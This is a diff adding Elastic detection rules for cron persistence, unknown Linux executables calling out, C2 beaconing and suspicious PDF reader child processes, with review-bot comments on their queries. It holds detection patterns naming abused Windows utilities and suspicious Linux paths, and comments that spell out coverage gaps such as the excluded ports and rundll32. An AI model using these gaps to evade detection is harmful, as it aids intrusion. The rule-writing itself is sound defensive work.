+ "rule_id": "530178da-92ea-43ce-94c2-8877a826783d", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "530178da-92ea-43ce-94c2-8877a826783d_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_8.json b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_8.json new file mode 100644 index 00000000000..598fce90de9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/53617418-17b4-4e9c-8a2c-8deb8086ca4b_8.json 
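Review bot: The only exclusion in `query` is the exact path `not process.executable == "/usr/bin/crontab"`, so every other writer of `/private/var/at/tabs/*` raises an alert, yet the rule ships neither a `false_positives` entry nor a `note` investigation guide telling the analyst which writers are expected (MDM or configuration-management agents that manage crontabs would presumably land here). A `false_positives` entry such as `"Legitimate management tools that install or update crontabs on behalf of users."` would give analysts the tuning context the description's "should not be highly prevalent" implies. Whether Elastic Defend reports the resolved `/private/var/...` path rather than the `/var/at/tabs` symlink path is not established by this file, so the `file.path` prefix is worth confirming against real events before relying on the rule. Minor: the description's "(i.e python, osascript, etc.)" lists examples, so `e.g.` is the intended abbreviation.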
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for network connectivity to the internet from a previously unknown executable located in a suspicious directory to a previously unknown destination ip. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to establish connections to unknown or suspicious destinations such as a command and control server. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise.", + "from": "now-59m", + "history_window_start": "now-14d", + "index": [ + "auditbeat-*", + "filebeat-*", + "packetbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Network Activity to the Internet by Previously Unknown Executable", + "new_terms_fields": [ + "host.id", + "destination.ip", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating Suspicious Network Activity to the Internet by Previously Unknown Executable\n\nAfter being installed, malware will often call out to its command and control server to receive further instructions by its operators.\n\nThis rule leverages the new terms rule type to detect previously unknown processes, initiating network connections to external IP-addresses. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. 
Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate malicious behavior. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential malicious processes, reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Network Activity Detected via cat - afd04601-12fc-4149-9b78-9c3f8fe45d39\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:linux and event.category:network and event.action:(connection_attempted or ipv4_connection_attempt_event) and \nprocess.executable:(\n (/etc/crontab or /etc/rc.local or ./* or /boot/* or /dev/shm/* or /etc/cron.*/* or /etc/init.d/* or /etc/rc*.d/* or \n /etc/update-motd.d/* or /home/*/.* or /run/* or /srv/* or /tmp/* or /usr/lib/update-notifier/* or /var/tmp/*\n ) and not (/tmp/newroot/* or /tmp/snap.rootfs*)\n ) and \nsource.ip:(10.0.0.0/8 or 127.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) and \nnot process.name:(\n apt or chrome or curl or dnf or dockerd or dpkg or firefox-bin or java or kite-update or kited or node or rpm or\n saml2aws or wget or yum or ansible* or aws* or php* or pip* or python* or steam* or terraform*\n) and \nnot destination.ip:(\n 10.0.0.0/8 or 100.64.0.0/10 or 127.0.0.0/8 or 169.254.0.0/16 or 172.16.0.0/12 or 192.0.0.0/24 or 192.0.0.0/29 or \n 192.0.0.10/32 or 192.0.0.170/32 or 192.0.0.171/32 or 192.0.0.8/32 or 192.0.0.9/32 or 192.0.2.0/24 or \n 192.168.0.0/16 or 192.175.48.0/24 or 192.31.196.0/24 or 192.52.193.0/24 or 192.88.99.0/24 or 198.18.0.0/15 or \n 198.51.100.0/24 or 203.0.113.0/24 or 224.0.0.0/4 or 240.0.0.0/4 or \"::1\" or \"FE80::/10\" or \"FF00::/8\" or 0.0.0.0\n) and\nnot destination.port:(22 or 80 or 443)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "53617418-17b4-4e9c-8a2c-8deb8086ca4b", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n- Filebeat\n- Packetbeat\n\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. 
[Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete \u201cSetup and Run Filebeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n### Packetbeat Setup\nPacketbeat is a real-time network packet analyzer that you can use for application monitoring, performance analytics, and threat detection. Packetbeat works by capturing the network traffic between your application servers, decoding the application layer protocols (HTTP, MySQL, Redis, and so on), correlating the requests with the responses, and recording the interesting fields for each transaction.\n\n#### The following steps should be executed in order to add the Packetbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/packetbeat/current/setup-repositories.html).\n- To run Packetbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/packetbeat/current/running-on-docker.html).\n- For quick start information for Packetbeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-installation-configuration.html).\n- For complete \u201cSetup and Run Packetbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/packetbeat/current/setting-up-and-running.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 8 + }, + "id": "53617418-17b4-4e9c-8a2c-8deb8086ca4b_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5397080f-34e5-449b-8e9c-4c8083d7ccc6_4.json b/packages/security_detection_engine/kibana/security_rule/5397080f-34e5-449b-8e9c-4c8083d7ccc6_4.json new file mode 100644 index 00000000000..355bae4aad4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5397080f-34e5-449b-8e9c-4c8083d7ccc6_4.json 
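Review bot: `not destination.port:(22 or 80 or 443)` at the end of `query` excludes exactly the ports that the description and the `T1071` mapping say this rule is meant to catch, and together with `not process.name:(... curl or wget or python* ...)` the rule only observes unknown binaries on uncommon ports; that trade-off is nowhere stated where an analyst will read it. The `note` field's "False positive analysis" section should carry a line such as `- Connections on ports 22, 80 and 443, and from the listed interpreters and package managers, are excluded for noise reduction; pair this rule with web-protocol C2 rules for coverage of those ports.` Separately, `source.ip:(10.0.0.0/8 or 127.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)` means hosts with a public or 100.64.0.0/10 source address never match, and since the destination exclusion list already lists 100.64.0.0/10 the omission on the source side looks unintentional. The `event.action` values `connection_attempted` and `ipv4_connection_attempt_event` appear to be Endpoint/Endgame-specific, so it is unclear whether the `auditbeat-*`, `filebeat-*` and `packetbeat-*` patterns in `index` (and their long setup sections) can ever produce a match — worth confirming against the beats field mappings.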
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A statistical model has identified command-and-control (C2) beaconing activity. Beaconing can help attackers maintain stealthy communication with their C2 servers, receive instructions and payloads, exfiltrate data and maintain persistence in a network.", + "from": "now-1h", + "index": [ + "ml_beaconing.all" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Statistical Model Detected C2 Beaconing Activity", + "query": "beacon_stats.is_beaconing: true and\nnot process.name: (\"WaAppAgent.exe\" or \"metricbeat.exe\" or \"packetbeat.exe\" or \"WindowsAzureGuestAgent.exe\" or \"HealthService.exe\" or \"Widgets.exe\" or \"lsass.exe\" or \"msedgewebview2.exe\" or \"MsMpEng.exe\" or \"OUTLOOK.EXE\" or \"msteams.exe\" or \"FileSyncHelper.exe\" or \"SearchProtocolHost.exe\" or \"Creative Cloud.exe\" or \"ms-teams.exe\" or \"ms-teamsupdate.exe\" or \"curl.exe\" or \"rundll32.exe\" or \"MsSense.exe\" or \"wermgr.exe\" or \"java\" or \"olk.exe\" or \"iexplore.exe\" or \"NetworkManager\" or \"packetbeat\" or \"Ssms.exe\" or \"NisSrv.exe\" or \"gamingservices.exe\" or \"appidcertstorecheck.exe\" or \"POWERPNT.EXE\" or \"miiserver.exe\" or \"Grammarly.Desktop.exe\" or \"SnagitEditor.exe\" or \"CRWindowsClientService.exe\")\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/beaconing", + "https://www.elastic.co/security-labs/identifying-beaconing-malware-using-elastic" + ], + "related_integrations": [ + { + "package": "beaconing", + "version": "^1.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "beacon_stats.is_beaconing", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + 
"rule_id": "5397080f-34e5-449b-8e9c-4c8083d7ccc6", + "setup": "## Setup\n\nThe rule requires the Network Beaconing Identification integration assets to be installed, as well as network logs collected by the Elastic Defend or Network Packet Capture integrations.\n\n### Network Beaconing Identification Setup\nThe Network Beaconing Identification integration consists of a statistical framework to identify C2 beaconing activity in network logs.\n\n#### Prerequisite Requirements:\n- Fleet is required for Network Beaconing Identification.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Network events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) or [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n\n#### The following steps should be executed to install assets associated with the Network Beaconing Identification integration:\n- Go to the Kibana homepage. 
Under Management, click Integrations.\n- In the query bar, search for Network Beaconing Identification and select the integration to see more details about it.\n- Under Settings, click \"Install Network Beaconing Identification assets\" and follow the prompts to install the assets.\n", + "severity": "low", + "tags": [ + "Domain: Network", + "Use Case: C2 Beaconing Detection", + "Tactic: Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1102", + "name": "Web Service", + "reference": "https://attack.mitre.org/techniques/T1102/", + "subtechnique": [ + { + "id": "T1102.002", + "name": "Bidirectional Communication", + "reference": "https://attack.mitre.org/techniques/T1102/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "5397080f-34e5-449b-8e9c-4c8083d7ccc6_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_109.json b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_109.json new file mode 100644 index 00000000000..4c23467e472 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_109.json 
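Review bot: The `process.name` exclusion list in `query` contains `rundll32.exe`, `curl.exe`, `wermgr.exe`, `iexplore.exe` and `java`; rundll32 in particular is the subject of the `52aaab7b-...` rule at the top of this view, which maps its network activity to T1218.011 and T1071.001, so a beaconing signal from that binary is silently dropped here. If these entries exist for noise reduction, that rationale belongs in a `false_positives` entry or a `note` investigation guide, neither of which this rule has, e.g. `"Legitimate telemetry and update agents (WaAppAgent.exe, metricbeat.exe, MsSense.exe) produce periodic traffic that the model scores as beaconing."` The `required_fields` entry for `beacon_stats.is_beaconing` declares `"type": "unknown"` while the query compares it to `true`; if the beaconing integration maps the field as a boolean the declared type should say so — TODO confirm against the integration's field mapping.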
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of PDF reader applications. These child processes are often launched via exploitation of PDF applications or social engineering.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious PDF Reader Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious PDF Reader Child Process\n\nPDF is a common file type used in corporate environments and most machines have software to handle these files. This creates a vector where attackers can exploit the engines and technology behind this class of software for initial access or privilege escalation.\n\nThis rule looks for commonly abused built-in utilities spawned by a PDF reader process, which is likely a malicious behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve PDF documents received and opened by the user that could cause this behavior. 
Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"AcroRd32.exe\",\n \"Acrobat.exe\",\n \"FoxitPhantomPDF.exe\",\n \"FoxitReader.exe\") and\n process.name : (\"arp.exe\", \"dsquery.exe\", \"dsget.exe\", \"gpresult.exe\", \"hostname.exe\", \"ipconfig.exe\", \"nbtstat.exe\",\n \"net.exe\", \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"ping.exe\", \"qprocess.exe\",\n \"quser.exe\", \"qwinsta.exe\", \"reg.exe\", \"sc.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"tracert.exe\",\n \"whoami.exe\", \"bginfo.exe\", \"cdb.exe\", \"cmstp.exe\", \"csi.exe\", \"dnx.exe\", \"fsi.exe\", \"ieexec.exe\",\n \"iexpress.exe\", \"installutil.exe\", \"Microsoft.Workflow.Compiler.exe\", \"msbuild.exe\", \"mshta.exe\",\n \"msxsl.exe\", \"odbcconf.exe\", \"rcsi.exe\", \"regsvr32.exe\", \"xwizard.exe\", \"atbroker.exe\",\n \"forfiles.exe\", \"schtasks.exe\", \"regasm.exe\", \"regsvcs.exe\", \"cmd.exe\", \"cscript.exe\",\n \"powershell.exe\", \"pwsh.exe\", \"wmic.exe\", \"wscript.exe\", \"bitsadmin.exe\", \"certutil.exe\", \"ftp.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "53a26770-9cbd-40c5-8b57-61d01a325e14", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "53a26770-9cbd-40c5-8b57-61d01a325e14_109", + "type": "security-rule" +} \ No newline at end of 
file diff --git a/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_110.json b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_110.json new file mode 100644 index 00000000000..2d557989763 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/53a26770-9cbd-40c5-8b57-61d01a325e14_110.json 
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of PDF reader applications. These child processes are often launched via exploitation of PDF applications or social engineering.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious PDF Reader Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious PDF Reader Child Process\n\nPDF is a common file type used in corporate environments and most machines have software to handle these files. This creates a vector where attackers can exploit the engines and technology behind this class of software for initial access or privilege escalation.\n\nThis rule looks for commonly abused built-in utilities spawned by a PDF reader process, which is likely a malicious behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve PDF documents received and opened by the user that could cause this behavior. 
Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the 